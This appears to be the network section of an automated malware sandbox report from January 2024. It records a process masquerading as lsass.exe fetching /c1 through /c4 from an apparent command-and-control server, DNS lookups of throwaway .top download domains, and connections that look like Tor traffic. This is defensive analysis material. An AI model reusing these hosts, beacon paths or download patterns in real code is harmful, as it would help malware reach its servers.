            Jan 10, 2024 15:41:31.560952902 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.561050892 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.561234951 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.561281919 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.562118053 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.669184923 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:38.785082102 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:38.903166056 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:38.903263092 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:38.903876066 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.023890972 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038306952 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038351059 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038388014 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038393974 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.038427114 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038439035 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.038439035 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.038475037 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.038590908 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038640976 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.038666964 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.038712978 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.044754982 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.044820070 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.044820070 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.044902086 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.044981956 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.044981956 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.044987917 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.045037031 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.156457901 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156521082 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156562090 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156601906 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156646967 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156724930 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.156724930 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.156724930 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.156898975 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.156941891 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.157002926 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.157017946 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.157071114 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.157095909 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.157133102 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.157155991 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.157188892 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.159483910 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.159670115 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.162755013 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.162796021 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.162822008 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.162858963 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.162878036 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.162919044 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.162926912 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.162957907 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.162967920 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.163007975 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.163203955 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.163259029 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.163296938 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.163347006 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.163373947 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.163423061 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.163460970 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.163513899 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.277717113 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.277785063 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.277825117 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.277863979 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.277915955 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.277929068 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.277951956 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.277971983 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278026104 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278100967 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278140068 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278158903 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278178930 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278187990 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278220892 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278256893 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278306007 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278434038 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278471947 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278486013 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278518915 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278578997 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278619051 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278630972 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278666973 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.278723955 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.278774977 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.279992104 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.280106068 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.280173063 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.280230045 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.280286074 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.280360937 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.280421019 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.280544996 CET497579030192.168.2.6149.56.45.200
            Jan 10, 2024 15:41:39.369946003 CET497589000192.168.2.6107.189.8.226
            Jan 10, 2024 15:41:39.371094942 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.371165037 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.371243954 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.371665001 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.371681929 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.400532961 CET903049757149.56.45.200192.168.2.6
            Jan 10, 2024 15:41:39.547022104 CET900049758107.189.8.226192.168.2.6
            Jan 10, 2024 15:41:39.547849894 CET497589000192.168.2.6107.189.8.226
            Jan 10, 2024 15:41:39.548511982 CET497589000192.168.2.6107.189.8.226
            Jan 10, 2024 15:41:39.725694895 CET900049758107.189.8.226192.168.2.6
            Jan 10, 2024 15:41:39.725835085 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.725917101 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.726200104 CET900049758107.189.8.226192.168.2.6
            Jan 10, 2024 15:41:39.726238012 CET900049758107.189.8.226192.168.2.6
            Jan 10, 2024 15:41:39.726672888 CET497589000192.168.2.6107.189.8.226
            Jan 10, 2024 15:41:39.727122068 CET497589000192.168.2.6107.189.8.226
            Jan 10, 2024 15:41:39.727634907 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.727657080 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.727952957 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.728521109 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:39.732988119 CET4976080192.168.2.686.59.21.38
            Jan 10, 2024 15:41:39.773905993 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:39.904907942 CET900049758107.189.8.226192.168.2.6
            Jan 10, 2024 15:41:39.926037073 CET804976086.59.21.38192.168.2.6
            Jan 10, 2024 15:41:39.929678917 CET4976080192.168.2.686.59.21.38
            Jan 10, 2024 15:41:39.929946899 CET4976080192.168.2.686.59.21.38
            Jan 10, 2024 15:41:40.121692896 CET804976086.59.21.38192.168.2.6
            Jan 10, 2024 15:41:40.637095928 CET804976086.59.21.38192.168.2.6
            Jan 10, 2024 15:41:40.637126923 CET804976086.59.21.38192.168.2.6
            Jan 10, 2024 15:41:40.637198925 CET4976080192.168.2.686.59.21.38
            Jan 10, 2024 15:41:40.637404919 CET4976080192.168.2.686.59.21.38
            Jan 10, 2024 15:41:40.640316963 CET49761443192.168.2.6131.188.40.189
            Jan 10, 2024 15:41:40.640398979 CET44349761131.188.40.189192.168.2.6
            Jan 10, 2024 15:41:40.640490055 CET49761443192.168.2.6131.188.40.189
            Jan 10, 2024 15:41:40.640779018 CET49761443192.168.2.6131.188.40.189
            Jan 10, 2024 15:41:40.640809059 CET44349761131.188.40.189192.168.2.6
            Jan 10, 2024 15:41:40.640880108 CET44349761131.188.40.189192.168.2.6
            Jan 10, 2024 15:41:40.648189068 CET4976280192.168.2.6154.35.175.225
            Jan 10, 2024 15:41:40.829551935 CET804976086.59.21.38192.168.2.6
            Jan 10, 2024 15:41:41.703931093 CET4976280192.168.2.6154.35.175.225
            Jan 10, 2024 15:41:43.703957081 CET4976280192.168.2.6154.35.175.225
            Jan 10, 2024 15:41:47.703881979 CET4976280192.168.2.6154.35.175.225
            Jan 10, 2024 15:41:55.703932047 CET4976280192.168.2.6154.35.175.225
            Jan 10, 2024 15:41:59.735457897 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:59.735488892 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:59.735714912 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:59.735755920 CET44349759172.81.131.84192.168.2.6
            Jan 10, 2024 15:41:59.735802889 CET49759443192.168.2.6172.81.131.84
            Jan 10, 2024 15:41:59.860322952 CET49759443192.168.2.6172.81.131.84
            TimestampSource PortDest PortSource IPDest IP
            Jan 10, 2024 15:38:00.026719093 CET5416653192.168.2.61.1.1.1
            Jan 10, 2024 15:38:00.177167892 CET53541661.1.1.1192.168.2.6
            Jan 10, 2024 15:38:35.129169941 CET6538853192.168.2.61.1.1.1
            Jan 10, 2024 15:38:35.492938995 CET53653881.1.1.1192.168.2.6
            Jan 10, 2024 15:38:39.564996004 CET5836153192.168.2.61.1.1.1
            Jan 10, 2024 15:38:39.670294046 CET53583611.1.1.1192.168.2.6
            Jan 10, 2024 15:38:42.707699060 CET6459053192.168.2.61.1.1.1
            Jan 10, 2024 15:38:43.326620102 CET53645901.1.1.1192.168.2.6
            Jan 10, 2024 15:38:47.608666897 CET5703553192.168.2.61.1.1.1
            Jan 10, 2024 15:38:48.203423023 CET53570351.1.1.1192.168.2.6
            Jan 10, 2024 15:38:51.258502960 CET5379553192.168.2.61.1.1.1
            Jan 10, 2024 15:38:52.013695002 CET53537951.1.1.1192.168.2.6
            Jan 10, 2024 15:38:56.080550909 CET5495653192.168.2.61.1.1.1
            Jan 10, 2024 15:38:56.451299906 CET53549561.1.1.1192.168.2.6
            Jan 10, 2024 15:40:44.035413027 CET6307653192.168.2.61.1.1.1
            Jan 10, 2024 15:40:44.140208006 CET53630761.1.1.1192.168.2.6
            Jan 10, 2024 15:40:49.365242958 CET5732153192.168.2.61.1.1.1
            Jan 10, 2024 15:40:49.693957090 CET53573211.1.1.1192.168.2.6
            Jan 10, 2024 15:40:52.737531900 CET6470353192.168.2.61.1.1.1
            Jan 10, 2024 15:40:53.091784000 CET53647031.1.1.1192.168.2.6
            Jan 10, 2024 15:40:58.159080029 CET6319153192.168.2.61.1.1.1
            Jan 10, 2024 15:40:58.524116993 CET53631911.1.1.1192.168.2.6
            Jan 10, 2024 15:41:00.551562071 CET5914953192.168.2.61.1.1.1
            Jan 10, 2024 15:41:00.923995972 CET53591491.1.1.1192.168.2.6
            Jan 10, 2024 15:41:05.960225105 CET6425353192.168.2.61.1.1.1
            Jan 10, 2024 15:41:06.063793898 CET53642531.1.1.1192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jan 10, 2024 15:38:00.026719093 CET192.168.2.61.1.1.10x2359Standard query (0)api.wipmania.comA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:35.129169941 CET192.168.2.61.1.1.10xeda7Standard query (0)feedmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:39.564996004 CET192.168.2.61.1.1.10x7e5eStandard query (0)feedmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:42.707699060 CET192.168.2.61.1.1.10x7eStandard query (0)gotsomefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:47.608666897 CET192.168.2.61.1.1.10x8d7fStandard query (0)gotsomefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:51.258502960 CET192.168.2.61.1.1.10xfaefStandard query (0)gimmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:56.080550909 CET192.168.2.61.1.1.10x556cStandard query (0)gimmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:44.035413027 CET192.168.2.61.1.1.10x9df8Standard query (0)feedmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:49.365242958 CET192.168.2.61.1.1.10x29bdStandard query (0)feedmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:52.737531900 CET192.168.2.61.1.1.10x6805Standard query (0)gotsomefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:58.159080029 CET192.168.2.61.1.1.10x5f6fStandard query (0)gotsomefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:41:00.551562071 CET192.168.2.61.1.1.10x5879Standard query (0)gimmefile.topA (IP address)IN (0x0001)false
            Jan 10, 2024 15:41:05.960225105 CET192.168.2.61.1.1.10x2614Standard query (0)gimmefile.topA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jan 10, 2024 15:38:00.177167892 CET1.1.1.1192.168.2.60x2359No error (0)api.wipmania.com127.0.0.1A (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:35.492938995 CET1.1.1.1192.168.2.60xeda7Name error (3)feedmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:39.670294046 CET1.1.1.1192.168.2.60x7e5eName error (3)feedmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:43.326620102 CET1.1.1.1192.168.2.60x7eName error (3)gotsomefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:48.203423023 CET1.1.1.1192.168.2.60x8d7fName error (3)gotsomefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:52.013695002 CET1.1.1.1192.168.2.60xfaefName error (3)gimmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:38:56.451299906 CET1.1.1.1192.168.2.60x556cName error (3)gimmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:44.140208006 CET1.1.1.1192.168.2.60x9df8Name error (3)feedmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:49.693957090 CET1.1.1.1192.168.2.60x29bdName error (3)feedmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:53.091784000 CET1.1.1.1192.168.2.60x6805Name error (3)gotsomefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:40:58.524116993 CET1.1.1.1192.168.2.60x5f6fName error (3)gotsomefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:41:00.923995972 CET1.1.1.1192.168.2.60x5879Name error (3)gimmefile.topnonenoneA (IP address)IN (0x0001)false
            Jan 10, 2024 15:41:06.063793898 CET1.1.1.1192.168.2.60x2614Name error (3)gimmefile.topnonenoneA (IP address)IN (0x0001)false
            • 185.215.113.93
            • 193.11.164.243:9030
            • 199.58.81.140
            • 86.59.21.38
            • 149.56.45.200:9030
            • 131.188.40.189:443
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649719185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:38:25.268291950 CET170OUTGET /c1 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:38:25.509865999 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:25 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
            Jan 10, 2024 15:38:26.519258022 CET170OUTGET /c2 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:38:26.760479927 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:26 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
            Jan 10, 2024 15:38:27.946547031 CET170OUTGET /c3 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:38:28.190026999 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:28 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
            Jan 10, 2024 15:38:30.354223967 CET170OUTGET /c4 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
